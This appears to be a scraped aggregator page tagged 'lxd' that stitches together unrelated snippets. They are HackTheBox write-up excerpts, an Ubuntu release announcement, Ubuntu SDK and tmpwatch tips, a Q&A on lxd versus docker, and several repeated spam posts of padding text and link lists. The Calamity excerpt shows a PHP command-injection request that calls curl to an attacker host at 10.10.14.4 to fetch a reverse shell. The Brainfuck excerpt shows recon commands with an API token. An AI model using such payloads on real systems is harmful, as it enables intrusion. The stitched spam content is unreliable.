lxd

HTB-靶机-Brainfuck

大憨熊 提交于 2020-12-23 04:00:29
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.17 nmap -sC -sV -p- -T5 -oN brainfuck.nmap 10.10.10.17 nmap扫描结果 扫描结果有开放邮箱,https,还得知一些证书相关的信息,看到有brainfuck.htb和sup3rs3cr3t.brainfuck.htb 直接绑定hosts搞吧 echo " 10.10.10.17 brainfuck.htb " | sudo tee -a /etc/hosts echo "10.10.10.17 sup3rs3cr3t.brainfuck.htb" | sudo tee -a /etc/hosts 访问得到如上信息,发现了一些跟邮件有关的信息,一个邮箱orestis@brainfuck.htb 确认目标是wordpress程序,使用wpscan扫描一把 wpscan --disable-tls-checks --url https://brainfuck.htb -e ap,t,tt,u --api-token pFokhQNG8ZFEmmntdfHfTYnrYdnvJHKtVtDuHTqTqBc 得到一款插件相关的漏洞信息

HTB-靶机-Calamity

♀尐吖头ヾ 提交于 2020-12-04 18:31:12
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.27 本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描 执行命令 autorecon 10.10.10.27 -o ./calamity-autorecon 最终的扫描结果 得知开放两个端口,先访问80端口 没发现啥有价值的信息,看下上面程序跑的目录情况 发现200响应码 有最下面几个,访问了,确认admin.php看似是可以利用的 上面试了试admin/admin弱口令并未成功,然后看下burpsuite抓包情况 发现密码,使用此密码以用户admin进行登录 登录成功之后,显示上述信息,根据上述信息的提示可以是使用php进行命令执行,试了试还真可以 那么可以执行命令那么就反弹shell,这里开始使用nc,发现成功反弹之后又被踢出去了,后来拿到权限才知道是因为目标靶机有一个后台程序监听常用反弹shell的关键字导致,所以我这直接使用curl命令下载php反弹shell然后执行成功反弹,下面是反弹shell请求包 GET /admin.php?html=%3C%3Fphp+system%28( ' curl+http://10.10.14.4

树莓派上的 Ubuntu 20.10 提供了一个完整的 Linux 桌面和微云

守給你的承諾、 提交于 2020-10-24 10:37:11
2020 年 10 月 22 日:Canonical 今天宣布发布包含树莓派优化的 Ubuntu 20.10 桌面版和服务器版系统,以支持研究人员、发明家、教育和企业。为全世界最易可访问的硬件带来了全世界最为流行的开放平台。 “这次版本发布,我们庆祝树莓派基金会致力于将开放计算给带给全球人们所做的承诺”,Canonical CEO,Mark Shuttleworth 说到。“我们也很荣幸通过优化树莓派上的 Ubuntu 以支持上述倡议,不管是个人使用,教育用途还是作为他们未来业务的基础。” 树莓派 2、3 和 4 加入 Ubuntu 认证的一系列 X86 和 ARM 设备队列中。Ubuntu 是以公共云和桌面产品而闻名的操作系统(OS),在 AWS、微软 Azure、Google、IBM 和 Oracle Clouds 被广泛使用。戴尔、惠普和联想都对其电脑做了Ubuntu桌面认证。 Ubuntu 20.10 包含了为弹性的微云(micro cloud),提供VM的小型服务器集群,按需供给的边缘 Kuberenetes 的 LXD 4.6 和 MicroK8s 1.19。可适用于远程办公室,分公司,仓储和分布的基础设施。 Ubuntu 桌面 20.10 在树莓派桌面支持上方的 Ubuntu 20.10 集成了 GNOME 3.38,此版本改进了应用栅格

的软肋使不少实体书店难

三世轮回 提交于 2020-05-03 19:22:39
sdfsdf 服务网格作为一个改善服务到服务通信的专用基础设施层,是云原生范畴中最热门的话题。随着容器愈加流行,服务拓扑也频繁变动,这就需要更好的网络性能。服务网格能够通过服务发现、路由、负载均衡、心跳检测和支持可观测性,帮助我们管理网络流量。服务网格试图为无规则的复杂的容器问题提供规范化的解决方案 将供应链搬出中国,似乎成了过去两三个月新冠肺炎疫情衍生出的热门话题。 年初新冠肺炎疫情爆发,让中国供应链的生产活动几乎完全停顿,影响席卷全球:苹果的新 5G 有可能因疫情而延期推出,特斯拉新款芯片无法及时交付、陷入“芯片门”纠纷。其余像三星、小米、索尼等著名跨国企业,均受到供应链停摆的影响。 因此,qdaqanz.answers.yahoo.com/question/index?qid=20200427235710AAGf1t1?RP5=51pzd=99p answers.yahoo.com/question/index?qid=20200427235730AAYucIS?PZ3=97ptr=39l in.answers.yahoo.com/question/index?qid=20200427235730AAYucIS?HT9=19tjd=55t malaysia.answers.yahoo.com/question/index?qid=20200427235730AAYucIS

些还在相信我不是他们生

丶灬走出姿态 提交于 2020-05-03 18:58:53
sdfsdf 服务网格作为一个改善服务到服务通信的专用基础设施层,是云原生范畴中最热门的话题。随着容器愈加流行,服务拓扑也频繁变动,这就需要更好的网络性能。服务网格能够通过服务发现、路由、负载均衡、心跳检测和支持可观测性,帮助我们管理网络流量。服务网格试图为无规则的复杂的容器问题提供规范化的解决方案 将供应链搬出中国,似乎成了过去两三个月新冠肺炎疫情衍生出的热门话题。 年初新冠肺炎疫情爆发,让中国供应链的生产活动几乎完全停顿,影响席卷全球:苹果的新 5G 有可能因疫情而延期推出,特斯拉新款芯片无法及时交付、陷入“芯片门”纠纷。其余像三星、小米、索尼等著名跨国企业,均受到供应链停摆的影响。 因此,aszbsnz.answers.yahoo.com/question/index?qid=20200427193848AAnuG8y?HX9=97nzf=39p answers.yahoo.com/question/index?qid=20200427193915AA6QIvr?HJ3=39vrr=97z in.answers.yahoo.com/question/index?qid=20200427193915AA6QIvr?JL7=73hxb=75x malaysia.answers.yahoo.com/question/index?qid=20200427193915AA6QIvr

而来娉娉婷婷、清清浅浅

别说谁变了你拦得住时间么 提交于 2020-05-03 14:37:47
sdfsdf 服务网格作为一个改善服务到服务通信的专用基础设施层,是云原生范畴中最热门的话题。随着容器愈加流行,服务拓扑也频繁变动,这就需要更好的网络性能。服务网格能够通过服务发现、路由、负载均衡、心跳检测和支持可观测性,帮助我们管理网络流量。服务网格试图为无规则的复杂的容器问题提供规范化的解决方案 将供应链搬出中国,似乎成了过去两三个月新冠肺炎疫情衍生出的热门话题。 年初新冠肺炎疫情爆发,让中国供应链的生产活动几乎完全停顿,影响席卷全球:苹果的新 5G 有可能因疫情而延期推出,特斯拉新款芯片无法及时交付、陷入“芯片门”纠纷。其余像三星、小米、索尼等著名跨国企业,均受到供应链停摆的影响。 因此,jurqpmixcloud.com/430RipB0ZxJVow5?FV5=11jpv=97v mixcloud.com/riSrt3paSQ5bB7k?NZ9=33rlp=13b mixcloud.com/B1NLvIubT6vY5GJ?RH7=51ndh=19t mixcloud.com/9e6Nd0SO8sYYefb?PF7=97vzd=99t mixcloud.com/R0s4cobjQ18swC8?ZP9=17hnt=93v mixcloud.com/sFY8666KVn85281?VX9=95tlp=93r mixcloud.com/M68O1pE35POkdib?XN3

Ubuntu SDK 安装 踩坑记录 ubuntu 16.04 安装

假如想象 提交于 2020-04-19 18:25:52
关于ubuntu touch 的很多东西都可以在CSDN中https://me.csdn.net/UbuntuTouch找到。这位大神的博客中有很多资料。 原本就有Ubuntu SDK 安装说明,但现在直接安装会不能用了,所以记下我的踩坑记录。 由于 ubuntu-sdk-team从其软件源中移除老lxd 2.5的包。造成老现在在ubuntu 16.04上直接安装ubuntu-sdk-ide 是不能使用的。初始化失败。 之前较早版本ide工具未使用lxc容器。 偶然间发现ubuntu16的源中有LXD的新版本 sudo add-apt-repository ppa:ubuntu-sdk-team/ppa sudo apt-get update sudo apt-get dist-upgrade sudo apt-get install ubuntu-sdk-ide 不过默认lxd还是装的旧版本,需要手动调整一下 sudo apt-cache madison lxd 看看有没有新版本 lxd | 3.0.3-0ubuntu1~16.04.1 | https://mirrors.tuna.tsinghua.edu.cn/ubuntu xenial-backports/main amd64 Packages lxd | 2.0.11-0ubuntu1~16.04.4 | https:/

如何优雅地删除 Linux 中的垃圾文件

核能气质少年 提交于 2020-03-05 08:58:08
不知道大家是否也跟我一样,是一只要把的自己电脑文件安排的条理有序,把没用的文件会及时删掉的程序猿呢?如果是的话,那么我们可以愉快地探讨下文章的内容。如果不是的话,你也可以留下来凑凑热闹嘛(>-<)。 下面要介绍的是今天的主角—— tmpwatch ,它能帮助我们递归删除在给定时间内没有访问的文件和空目录。 当然,我们也可以使用 find 命令查找并删除超过 x 天未访问的文件,不过 tmpwatch 可以一步到位,何乐而不为? tmpwatch 默认根据文件或目录的访问时间(access time)来决定删除哪些文件或目录。除此之外,你还可以根据 inode 改变时间(inode change time)、修改时间(modification time)来进行操作。 通常, tmpwatch 用于删除 /tmp 目录下的文件,以及其它地方其他无用的文件,如旧的日志文件。 重要警告!! 不要在 / (根目录)中运行 tmpwatch! 不要在 / (根目录)中运行 tmpwatch!! 不要在 / (根目录)中运行 tmpwatch!!!(三遍警告! ^ - ^ ) / 目录包含 Linux 系统运行所必需的重要文件,而 tmpwatch 并没有内置保护机制防止在 / 目录上运行,一旦那些重要的文件被删除了,后果不堪设想!所以,小伙伴们在使用这个命令的时候一定要慎重! 安装

How is “lxd” different from lxc/docker?

点点圈 提交于 2020-01-01 01:16:30
问题 Questions How does lxd provide Full operating system functionality within containers, not just single processes? How is it different from lxc/docker + wrappers? Is it similar to a container that is launched with docker + supervisor/wrapper script to contain multiple processes in one container? In other words: What can I do with lxd that I cannot do with some wrappers over lxc and docker ? Why is it available only in ubuntu if they are making use of mainline kernel features (namespaces and